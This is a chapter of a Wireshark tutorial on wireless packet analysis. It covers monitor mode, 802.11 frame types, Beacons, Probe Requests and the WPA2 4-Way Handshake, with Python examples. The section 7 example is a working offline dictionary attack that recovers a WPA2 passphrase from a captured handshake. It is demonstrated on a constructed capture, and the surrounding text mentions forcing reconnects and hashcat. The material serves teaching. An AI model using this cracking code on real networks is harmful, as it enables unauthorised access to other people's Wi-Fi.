Wireshark Basics – Complete Beginner to Advanced Guide

Updated: May 16, 2026

# CHAPTER 14

Wireless Packet Analysis

1. Introduction

Until now, we have been analyzing Ethernet (802.3) traffic. The modern world, however, is untethered. Analyzing traffic as it travels invisibly through the air introduces an entirely new layer of complexity. Wireless networks use the 802.11 standard, which needs dedicated management frames just to establish and maintain a connection before any real data can flow. In this chapter we turn to Wireless Packet Analysis. We will explain the critical concept of "Monitor Mode," dissect 802.11 Beacon Frames, and outline (in theory) the capture of the WPA2 4-Way Handshake, including why WPA3 changes that picture.

2. Learning Objectives

By the end of this chapter, you will be able to:
  • Explain the physical and software requirements for entering "Monitor Mode."
  • Differentiate between 802.11 Management, Control, and Data frames.
  • Identify Beacon Frames and extract the SSID of a wireless network.
  • Understand the function of Probe Requests and Probe Responses.
  • Describe the structure of a WPA2 4-Way encryption handshake.

3. The Hurdle: Monitor Mode

When you open Wireshark on your laptop and capture on the "Wi-Fi" interface in its normal (managed) mode, the driver hands Wireshark frames that have already been stripped of their 802.11 headers and re-dressed as ordinary Ethernet frames. You will see *your* traffic and nothing else. You will NOT see the raw 802.11 frames (Beacons, Probes, acknowledgements), and you will NOT see your neighbor's traffic. Ticking "promiscuous mode" in the capture options does not change this on most Wi-Fi drivers: in managed mode the card only passes up frames addressed to it, after it has decrypted them with your own session key.

To see the raw physics of Wi-Fi, your network card must support Monitor Mode.

  • In Monitor Mode, the Wi-Fi card stops acting as a client of your router. It simply listens on one radio channel (e.g., Channel 6 on the 2.4 GHz band) and passes up *every* 802.11 frame it hears on that channel, regardless of which network or device it belongs to, including the management and control frames a managed-mode card never shows you.
  • *Note:* It is the driver, not the radio, that decides whether Monitor Mode is available. Most Windows Wi-Fi drivers do not expose it (Npcap's WlanHelper can enable it on some adapters), while Linux drivers for many chipsets do, which is why practitioners use a USB adapter with a supported chipset (Alfa Networks adapters are the usual choice) on a Linux distribution such as Kali Linux, switching the card with airmon-ng or iw. Built-in cards on macOS also support Monitor Mode via the checkbox in Wireshark's capture options.

4. Anatomy of 802.11 Frames

When capturing in Monitor Mode, you no longer see Ethernet II in the Wireshark Details pane. Each frame instead begins with a Radiotap header (radio metadata the driver attaches: channel, frequency, signal strength), which Wireshark shows as Radiotap Header and 802.11 radio information, followed by the IEEE 802.11 Wireless LAN header itself.

802.11 traffic is divided into three types (the value of the wlan.fc.type field):

  1. Management Frames (type 0): Used to establish and maintain connections (e.g., Beacons, Probes, Authentication, Association, Deauthentication). Beacons and Probes are always sent in cleartext, which is why any capture can read them; Protected Management Frames (802.11w) only protect a subset such as Deauthentication.
  2. Control Frames (type 1): Used to assist in the delivery of data over the shared radio medium (e.g., Request-to-Send, Clear-to-Send, ACK). They carry no payload and, for the most part, only a receiver address.
  3. Data Frames (type 2): The actual payload (IP, TCP, HTTP). On a WPA2/WPA3 network the body of these frames is encrypted and the Protected Frame bit in the Frame Control field is set.

5. Beacon Frames (The Heartbeat)

Every Wi-Fi access point constantly announces itself, by default every 100 time units (102.4 ms, so roughly 10 times a second): *"I am here! My name is 'Starbucks Wi-Fi'!"* These are Beacon Frames. If you filter Wireshark for wlan.fc.type_subtype == 8 (0x08, the Management/Beacon code), you will see hundreds of them. Expand IEEE 802.11 Wireless Management -> Tagged parameters. Here you will find the SSID parameter set (the network name), the Supported Rates, the DS Parameter set (the channel the access point is on), and the RSN Information element, which lists the cipher suites (CCMP/AES) and the authentication method (PSK, 802.1X or SAE) the network requires, i.e. whether it is WPA2 or WPA3. A network configured to "hide" its SSID still sends Beacons; the SSID element is simply empty, and the name leaks anyway in the Probe Request/Response exchange when a client connects.

6. Probe Requests (Your Phone is Snitching)

When you walk into a coffee shop, how does your phone connect to a Wi-Fi network it has used before? Your phone periodically sends out Probe Requests (wlan.fc.type_subtype value 4). It shouts: *"Is 'HomeNetwork' here? Is 'Starbucks Wi-Fi' here?"* If an access point hears its name (or receives a broadcast probe with an empty SSID, meaning "is anyone there?"), it sends a Probe Response (value 5): *"Yes, I am here, this is how to reach me."* *Forensic value:* By capturing raw Probe Requests in a public area, an analyst can see the list of Wi-Fi networks a phone is still looking for, which maps out where its owner has been. *Caveat:* current iOS and Android releases randomize the MAC address used for probing and mostly send broadcast probes rather than naming remembered networks, so on a modern phone this leak is far smaller than it was a decade ago; older devices, IoT gadgets and laptops with older drivers still give it away.
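The dissection described in sections 4 to 6, as an added example in Python that is not part of this chapter or of Wireshark: a small 802.11 frame dissector that classifies a frame the way wlan.fc.type and wlan.fc.type_subtype do and pulls the SSID, channel and RSN flag out of the tagged parameters of a Beacon or Probe Request. The three sample frames (a Beacon, a Probe Request and an ACK), the MAC addresses and the SSIDs are constructed for the demonstration, and the frames are assumed to arrive without a Radiotap header (i.e. already stripped of the radio metadata).

```python
"""Minimal IEEE 802.11 frame dissector (added example, not the chapter's code)."""
import struct

# (type, subtype) -> name, using the same numbering as Wireshark's
# wlan.fc.type_subtype field, whose value is (type << 4) | subtype.
NAMES = {
    (0, 0): "Association Request", (0, 1): "Association Response",
    (0, 4): "Probe Request", (0, 5): "Probe Response", (0, 8): "Beacon",
    (0, 10): "Disassociation", (0, 11): "Authentication",
    (0, 12): "Deauthentication", (1, 11): "Request-to-Send",
    (1, 12): "Clear-to-Send", (1, 13): "ACK", (2, 0): "Data", (2, 8): "QoS Data",
}
TYPE_NAMES = {0: "Management", 1: "Control", 2: "Data"}
SSID_TAG, DS_PARAM_TAG, RSN_TAG = 0, 3, 48     # tag numbers in Tagged parameters


def mac(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def parse_tags(body: bytes) -> dict:
    """Walk the tag/length/value list that follows the fixed parameters."""
    out = {"ssid": None, "channel": None, "rsn": False}
    i = 0
    while i + 2 <= len(body):
        tag, length = body[i], body[i + 1]
        value = body[i + 2:i + 2 + length]
        if len(value) < length:            # truncated element: stop, do not overrun
            break
        if tag == SSID_TAG:                # zero length = "hidden" network
            out["ssid"] = value.decode("utf-8", "replace") if length else "<hidden>"
        elif tag == DS_PARAM_TAG and length == 1:
            out["channel"] = value[0]      # channel the AP is transmitting on
        elif tag == RSN_TAG:
            out["rsn"] = True              # RSN element present: WPA2/WPA3 network
        i += 2 + length
    return out


def parse_frame(frame: bytes) -> dict:
    """Dissect one raw 802.11 frame (no Radiotap header in front of it)."""
    fc, flags = frame[0], frame[1]         # Frame Control, little-endian 16 bits
    ftype, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF
    info = {
        "type": TYPE_NAMES.get(ftype, "Reserved"),
        "subtype": NAMES.get((ftype, subtype), f"type {ftype} subtype {subtype}"),
        "type_subtype": (ftype << 4) | subtype,
        "protected": bool(flags & 0x40),   # Protected Frame bit: body is encrypted
        "addr1": mac(frame[4:10]),         # Receiver / Destination
    }
    if ftype == 1:                         # control frames stop after the RA
        return info
    info["addr2"] = mac(frame[10:16])      # Transmitter / Source
    info["addr3"] = mac(frame[16:22])      # BSSID for most frames
    body = frame[24:]
    if ftype == 2 and (flags & 0x03) == 0x03:   # To DS + From DS: 4th address (WDS)
        info["addr4"] = mac(frame[24:30])
        body = frame[30:]
    if ftype == 0 and subtype in (5, 8):        # Beacon / Probe Response fixed fields:
        info["beacon_interval_tu"] = struct.unpack_from("<H", body, 8)[0]
        body = body[12:]                        # timestamp(8) interval(2) capability(2)
    if ftype == 0 and subtype in (4, 5, 8):
        info.update(parse_tags(body))
    return info


def build_mgmt(subtype: int, addr1: bytes, addr2: bytes, addr3: bytes, body: bytes) -> bytes:
    """Assemble a management frame; used only to construct the sample input."""
    fc = bytes([subtype << 4, 0x00])           # type 0, no flags
    return fc + b"\x00\x00" + addr1 + addr2 + addr3 + b"\x10\x00" + body


BROADCAST = b"\xff" * 6
AP = bytes.fromhex("020000aabbcc")             # constructed, locally administered MACs
STA = bytes.fromhex("020000112233")

# Constructed Beacon: timestamp, interval 100 TU, capability, then tagged parameters.
BEACON = build_mgmt(8, BROADCAST, AP, AP,
                    b"\x00" * 8 + struct.pack("<H", 100) + b"\x11\x04"
                    + b"\x00\x0fStarbucks Wi-Fi"          # SSID parameter set
                    + b"\x01\x04\x82\x84\x8b\x96"         # Supported Rates
                    + b"\x03\x01\x06"                      # DS Parameter set: channel 6
                    + b"\x30\x02\x01\x00")                 # RSN Information (stub body)
# Constructed Probe Request from a phone asking for a remembered network.
PROBE = build_mgmt(4, BROADCAST, STA, BROADCAST,
                   b"\x00\x0bHomeNetwork" + b"\x01\x04\x82\x84\x8b\x96")
# Constructed ACK control frame: Frame Control 0xd4 0x00, duration, receiver address.
ACK = bytes([0xd4, 0x00, 0x00, 0x00]) + STA

if __name__ == "__main__":
    for f in (BEACON, PROBE, ACK):
        print(parse_frame(f))
```

Feeding the dissector a real capture means stripping the Radiotap header first (its length is in bytes 2-3 of the header, little-endian); the frame-control decoding and tag walk are then exactly what Wireshark does under IEEE 802.11 Wireless LAN and Tagged parameters.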

7. The WPA2 4-Way Handshake

To connect to a WPA2-Personal network, the client and the access point must prove to each other that they hold the same Wi-Fi passphrase and derive fresh per-session keys from it. This is the EAPOL 4-Way Handshake (filter: eapol). The passphrase and SSID are stretched into a 256-bit Pairwise Master Key (PMK) with PBKDF2 (4096 rounds of HMAC-SHA1); the PMK, both MAC addresses and a random nonce from each side (ANonce in message 1, SNonce in message 2) are mixed into the Pairwise Transient Key (PTK); and messages 2, 3 and 4 each carry a MIC computed with the first 16 bytes of the PTK. Every one of those inputs except the passphrase travels in the clear. So if an attacker running Wireshark in Monitor Mode on the right channel captures the handshake as a legitimate user connects (in practice messages 1 and 2 are enough), they can take the PCAP offline and test passphrase guesses at their own pace with a dictionary or brute-force tool such as hashcat, recomputing the MIC for each guess until one matches. Wireshark itself does not crack anything, but it is the tool used to capture the handshake and confirm it is complete. Two caveats: the handshake only occurs when a client (re)connects, so the attacker has to wait for one or force the client to reconnect; and WPA3-Personal replaces the passphrase-derived PMK with one negotiated by SAE (Dragonfly), which is designed so that a captured exchange gives an offline attacker nothing to test guesses against.
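The key derivation just described and the offline attack it enables, as an added example in Python that is not part of this chapter, of Wireshark or of hashcat. It derives PMK, PTK and the message-2 MIC exactly as 802.11i specifies for WPA2 with AES (key descriptor version 2), then recovers the passphrase from a constructed "captured" handshake by rederiving the MIC for each word in a list. The function names, the MAC addresses, the wordlist and the EAPOL-Key body layout (only the SNonce position is real; the other fields are zero placeholders) are assumptions for the demonstration.

```python
"""WPA2-PSK key derivation and offline passphrase recovery (added example)."""
import hashlib
import hmac
import os


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK (48 bytes for CCMP) = KCK(16) | KEK(16) | TK(16).
    Inputs are ordered min||max so both sides derive the same value."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """Key-descriptor version 2 MIC: HMAC-SHA1 over the EAPOL-Key frame with its
    16-byte MIC field zeroed, truncated to 16 bytes."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def crack(handshake: dict, wordlist):
    """Offline dictionary attack: rederive message 2's MIC for each candidate
    passphrase and compare it with the captured one. Returns the match or None."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, handshake["ssid"])
        ptk = ptk_from_pmk(pmk, handshake["ap_mac"], handshake["sta_mac"],
                           handshake["anonce"], handshake["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], handshake["eapol_m2_zeroed"]),
                               handshake["mic_m2"]):
            return candidate
    return None


def fake_capture(passphrase: str, ssid: str) -> dict:
    """Constructed stand-in for a capture: everything the attacker would read
    out of message 1 (ANonce) and message 2 (SNonce, MIC) plus the 802.11 headers."""
    ap_mac, sta_mac = bytes.fromhex("020000aabbcc"), bytes.fromhex("020000112233")
    anonce, snonce = os.urandom(32), os.urandom(32)
    # EAPOL-Key message 2 with the MIC field zeroed. 802.1X header (4) + descriptor
    # type (1) + key info 0x010a (2) + key length (2) + replay counter (8) puts the
    # SNonce at offset 17, as in a real frame; the remaining fields are placeholders.
    m2 = (b"\x01\x03\x00\x65\x02\x01\x0a" + b"\x00" * 10 + snonce + b"\x00" * 56)
    ptk = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac,
            "anonce": anonce, "snonce": snonce,
            "eapol_m2_zeroed": m2, "mic_m2": eapol_mic(ptk[:16], m2),
            "tk": ptk[32:48]}   # the CCMP key a decryptor needs for this session


if __name__ == "__main__":
    cap = fake_capture("correct horse battery", "Starbucks Wi-Fi")
    words = ["password", "starbucks1", "correct horse battery", "letmein"]
    print("recovered passphrase:", crack(cap, words))
```

The cost of the attack is the 4096-round PBKDF2 per guess, which is why hashcat's GPU implementation exists; note that nothing in the handshake is encrypted, so what Wireshark hands over is plaintext that happens to be useless without the passphrase.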

8. Best Practices

  • Channel Hopping: Wi-Fi is spread over many channels (1-13 on 2.4 GHz depending on the regulatory region, with 1, 6 and 11 the usual non-overlapping choices in the US, plus dozens more on 5 GHz and 6 GHz). A card in Monitor Mode listens to one channel at a time, and Wireshark never changes it. If you want a complete picture of your own network, read the channel your access point advertises in its Beacons (the DS Parameter set) and lock the capture card to it with iw or airmon-ng before starting the capture; on the wrong channel you will see only the other networks that share it, never your own. Survey tools such as airodump-ng hop channels to discover networks, but hopping means you miss every frame on the channels you are not currently on, which is fatal when you are waiting for a handshake.

9. Common Mistakes

  • Expecting to read WPA2 payloads: A beginner buys a Monitor Mode USB adapter, captures a neighbor's traffic, and expects to see HTTP web history. They are disappointed to see everything labeled 802.11 Encrypted Data. WPA2/WPA3 encrypt the body of every Data Frame at Layer 2 (CCMP, i.e. AES in CCM mode, or GCMP) with per-client session keys; only the 802.11 header (MAC addresses, sequence numbers) stays readable. Without the passphrase *and* that client's 4-Way Handshake, the payload cannot be recovered, and on WPA3 even the passphrase is not enough, because the session keys come from SAE rather than from the passphrase directly.

10. Mini Project: Filter Wi-Fi Traffic (Theory)

If you have a sample raw 802.11 PCAP file (the Wireshark Wiki's SampleCaptures page has several):
  1. Apply the filter wlan to see only wireless frames.
  2. Filter for Beacons: wlan.fc.type_subtype == 8.
  3. Expand the IEEE 802.11 wireless LAN header. Note the Frame Control field (type and subtype, plus flags such as To DS, From DS and Protected Frame) and the address fields. Management frames carry three addresses (Receiver/Destination, Transmitter/Source, BSSID); a Data Frame carries a *fourth* address only when both the To DS and From DS flags are set, i.e. when it is being relayed between two access points.
  4. Expand Tagged parameters -> SSID parameter set to read the plaintext name of the Wi-Fi network, and DS Parameter set to read the channel it is on.

11. Practice Exercises

  1. Explain the operational difference between a managed-mode ("promiscuous") capture and a Monitor Mode capture on a Wi-Fi interface.
  2. What is the primary function of an 802.11 Beacon Frame?

12. MCQs with Answers

Question 1

Which specific Wi-Fi capture mode allows a network interface card to passively listen to every raw 802.11 frame on a radio channel, without associating with any access point?

Question 2

When your smartphone actively searches for previously known Wi-Fi networks by broadcasting their names into the air, what type of 802.11 Management Frame is it sending?

13. Interview Questions

  • Q: A security audit requires you to capture raw 802.11 management frames (Beacons and Probes). What hardware and software configuration is strictly required to accomplish this?
  • Q: Describe the security vulnerability associated with smartphones continuously transmitting 802.11 Probe Requests in public spaces.
  • Q: Explain the purpose of the WPA2 4-Way Handshake. From a penetration testing perspective, why is capturing these specific packets in Wireshark highly desirable?

14. FAQs

Q: If I know the Wi-Fi password, can Wireshark decrypt the WPA2 traffic automatically? A: Yes, for WPA2-Personal. Go to Preferences -> Protocols -> IEEE 802.11, tick "Enable decryption", and add a Decryption Key of type wpa-pwd in the form password:SSID (the SSID is needed because it is the salt in the PBKDF2 derivation of the PMK). Wireshark then derives the session keys for every client whose 4-Way Handshake appears in the capture and shows the IP/TCP traffic underneath the CCMP (AES) encryption. If (and only if) you captured the handshake of the device in question, its traffic decrypts; frames from clients that connected before the capture started stay opaque, because their session keys were negotiated before you were listening. For WPA3-SAE and enterprise (802.1X) networks the passphrase is not sufficient; you must supply the 256-bit PMK (key type wpa-psk, in hex) obtained from the client or the access point instead.

15. Summary

In Chapter 14, we transitioned from the copper wire to the radio spectrum. We established the absolute necessity of hardware "Monitor Mode" to capture raw 802.11 wireless frames. We dissected the three categories of Wi-Fi traffic, focusing on the Management Frames that make wireless networking possible. We extracted SSIDs from Beacon Frames, mapped device history via Probe Requests, and acknowledged the immense security implications of capturing the WPA2 4-Way encryption handshake.

16. Next Chapter Recommendation

We have analyzed the transport mechanisms. Now let's analyze complex real-time payloads. Proceed to Chapter 15: VoIP and Streaming Analysis.
